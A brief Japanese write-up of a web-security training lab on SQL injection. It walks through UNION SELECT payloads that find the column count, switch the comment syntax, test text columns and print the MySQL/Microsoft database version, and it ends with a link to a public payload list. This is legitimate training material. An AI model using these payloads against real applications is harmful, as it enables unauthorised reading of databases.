Hello there, ('ω')ノ
MySQLとMicrosoftのデータベースタイプとバージョンのクエリを。
このラボには、SQLインジェクションの脆弱性があって。
UNION攻撃を使用して、挿入されたクエリから結果を取得できるらしく。
まずは、ページにアクセスして。
まずは、カラム数の確認から。
'+UNION+SELECT+NULL,NULL--
コメントタイプを変更すると正常なレスポンスが返ってきて。
'+UNION+SELECT+NULL,NULL#
次にカラムのデータ形式でテキストデータを確認して。
'+UNION+SELECT+'abc','def'#
最後に下記のペイロードでデータベースのバージョンを表示して。
'+UNION+SELECT+@@version,NULL#
クリアできた。
SQLインジェクションのペイロードもWEB上にあって。
これらを参考に組み立てていけばよいかと。
https://github.com/payloadbox/sql-injection-payload-list
Best regards, (^^ゞ